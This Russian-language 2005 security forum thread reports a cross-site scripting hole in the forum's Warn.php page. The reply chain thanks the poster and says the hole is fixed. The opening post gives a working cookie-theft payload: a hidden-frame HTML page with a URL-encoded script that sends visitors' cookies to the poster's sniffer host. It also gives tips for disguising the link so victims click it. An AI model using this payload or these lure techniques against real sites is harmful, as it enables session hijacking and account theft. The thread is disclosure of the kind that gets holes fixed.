Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
New! Уязвимость Форум.Античат.Ру (не критическая) |
11.05.2005, 21:42
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
New! Уязвимость Форум.Античат.Ру (не критическая)
http://forum.antichat.ru/Warn.php пропускает вхождения
Пример: http://forum.antichat.ru/Warn.php?do...kie);</script>
Чего делать?
Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт.
Вот так выглядит index.html (в примере адрес снифера указан мой):
Код HTML:
<html>
<head>
<title>Типа липовый сайт...</title>
</head>
<frameset cols="0,*" frameborder="NO" border="0" framespacing="0">
<frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E">
<frame name="mainFrame" src="main_frame.html">
</frameset>
<noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes>
</html>
...
*
Так как + (плюсик) вырезается, его заменяем: %2B
Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем:
" - %22
> - %3C
> - %3E
...
Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал).
Как пример:
...
!ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР!
...
Всем добро пожаловать на сайт http://forum.antichat.ru
...
© censored!
Последний раз редактировалось censored!; 11.05.2005 в 21:46..
|
|
|
11.05.2005, 22:23
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
Нифига себе намутил . А бага то красивая  Аффтар жжот!!! |
|
|
|
11.05.2005, 22:25
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Спасибо, исправлено.
|
|
|
|
12.05.2005, 16:29
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807
Репутация:
901
|
|
censored!
Младца!, Что еще сказать? =). Интересно, когда же ты мне аську свою в приват отошлешь? =)))
|
|
|
|
12.05.2005, 16:53
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
Сообщение от Algol
Спасибо, исправлено.
хорошо что исправил а то я по этой ссылке перешел )))
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
12.05.2005, 20:19
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Молодец ... Даю грина )
|
|
|
|
14.05.2005, 02:08
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Интересно, когда же ты мне аську свою в приват отошлешь?
Чуток попозже. А то из дома по модему раз в год, а на работе тогда ообще люлей отгребу. Я ведь в инете уже живу почти. 18 часов в сутки =)
хорошо что исправил а то я по этой ссылке перешел
Ничего бы страшного не случилось:
а. я не крыс и не гажу там где живу
б. толку то мне от твоего хеша
пасиба!
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
